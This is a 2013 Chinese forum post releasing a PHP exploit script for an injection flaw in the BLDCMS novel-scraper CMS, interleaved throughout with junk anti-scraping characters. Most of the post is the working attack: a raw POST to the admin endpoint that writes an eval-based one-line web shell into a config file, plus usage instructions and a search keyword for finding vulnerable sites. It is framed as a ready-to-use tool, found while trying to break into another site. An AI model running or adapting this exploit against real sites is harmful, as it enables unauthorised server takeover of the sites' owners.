之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞0 z3 J7 G3 Q& e G6 C, Y$ [: z
4 ]# r+ X" q* L3 h* r9 e9 F8 H
! K+ T. u, p# @% w9 k9 c( G! A' I# T! w话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 + i5 w* i# i+ P0 }2 M% K
3 e+ s+ j/ n6 |2 u, p: J既然都有人发了 我就把我之前写好的EXP放出来吧
% k) I! c& f3 u/ E4 h6 g6 M
7 `& _, ]0 g9 k9 k! O# pview source print?01.php;">
2 @& {, w: C9 \, c; ]02.<!--?php
) I, S* y1 V& }: S, w03.echo "-------------------------------------------------------------------- [0 C! ^% ]5 U6 e/ h# n8 n
04.
- W) M# t, N" j" ~( |! X05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
4 f7 D. y0 O6 t \06. 2 T0 @% y& a* h, H
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun/ M# g: n' }' C) l7 R; d2 y* E) p
08.
" V$ l! Z" g; U7 A& z) n09.QQ:981009941\r\n 2013.3.21\r\n : E# M7 t0 g+ M
10.
- x) P9 }& A1 q- M# _8 {& W11. x2 `8 h* N2 R5 ~
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
! s7 i9 v9 v/ Q' B13. j. a6 |2 i5 x. B& S
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
$ o9 e) T4 N, L0 r, C; j15.
- X- _" H2 c2 H. H% n H* @0 ]16.--------------------------------------------------------------------\r\n";+ s' N6 i% o2 e4 }- F4 R3 h3 V
17.$url=$argv[1];
* x0 u7 X* x- y4 f* R$ _18.$dir=$argv[2];) Q! A! \/ ^0 @: R. e- B
19.$pass=$argv[3];- i4 B4 A4 L' G4 j$ n/ S
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
4 Z1 ?, m) i. R; p! a, _! J21.if (emptyempty($pass)||emptyempty($url)); b- t! I: P3 H( n9 S) F
22.{exit("请输入参数");}8 ~" }: M" r$ F6 z9 u# y6 [
23.else
- z9 K$ k6 m- l1 V4 H/ r# `( F24.{0 [& g0 x4 ] P3 `
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev, c7 {: b) V0 W& w m# M
26. 7 r0 c4 l/ X9 k' G8 w
27.al;! s' `/ J5 Y" l
28.$length = strlen($fuckdata);
; g/ g3 \1 B6 Q" w29.function getshell($url,$pass)
" C9 D7 @& r' s k1 Q30.{" ~& R# H5 Q J: h5 {4 E# U
31.global $url,$dir,$pass,$eval,$length,$fuckdata;1 E8 v8 b) [6 h* _2 `; C
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";) e8 e2 F* ]- X, C( m/ [5 `/ ^7 k
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";- ~& ]( n7 b) _+ e8 E6 ~4 _9 d S/ ?
34.$header .= "User-Agent: MSIE\r\n";- M: R% n$ J" O$ l# C
35.$header .= "Host:".$url."\r\n";
6 }3 @ Y4 |- [) N# q$ z36.$header .= "Content-Length: ".$length."\r\n";+ V2 _2 i+ l$ F# B
37.$header .= "Connection: Close\r\n";; T% r. p8 m0 } e' S: F8 K5 ]
38.$header .="\r\n";
+ R) p u. ]- C" v39.$header .= $fuckdata."\r\n\r\n";
( Q' E/ z. U- H. K40.$fp = fsockopen($url, 80,$errno,$errstr,15);9 @4 r' w9 Y9 ^8 I
41.if (!$fp)3 r9 g( R) t: y
42.{
0 ]! S! S8 B* I8 G6 B& n43.exit ("利用失败:请检查指定目标是否能正常打开");
( b0 Q$ e7 n" [$ o/ f44.}9 ?9 v' \9 H4 e% P" k$ N* u
45.else{ if (!fputs($fp,$header))7 J' W5 c9 s( r
46.{exit ("利用失败");}
* L/ l; X/ M' k) U3 D+ z, u47.else
# n3 E, ?3 a+ l% E! P# w5 u48.{) t* X6 G4 k- i, I& \7 {1 }
49.$receive = '';
7 H" D7 W0 b# o4 M1 b/ O50.while (!feof($fp)) {
# C% N" A, d m- K51.$receive .= @fgets($fp, 1000);
. W9 ~6 ~8 j( s& y. ]- }52.}
9 y9 N m0 p' G0 t' @53.@fclose($fp);4 K( K: r4 y+ V' g$ Q
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
$ z/ I' R' S: S1 |7 F, H: H% G55.
, u8 l; U- f) I C+ d: K" @56.GPC是否=off)";
: C) O2 p. x4 c" \57.}}
' W3 T0 f9 S) G4 x58.}
! }: I, B/ r5 X: N59.}+ G$ N2 l) ]$ U
60.getshell($url,$pass);
! h( i- W, H, H% p8 z# b3 K61.?-->
% M- J9 Y5 T2 v! \) r$ d $ K2 ~8 c. p9 }1 j( A* L) F; F
% F4 ~$ t8 p2 `- M ]: { - W6 \% Y1 c, C/ Q2 j
by 数据流
9 A% n. e8 q7 p% Z |
发表于 2013-3-26 20:49:10
收藏
支持
反对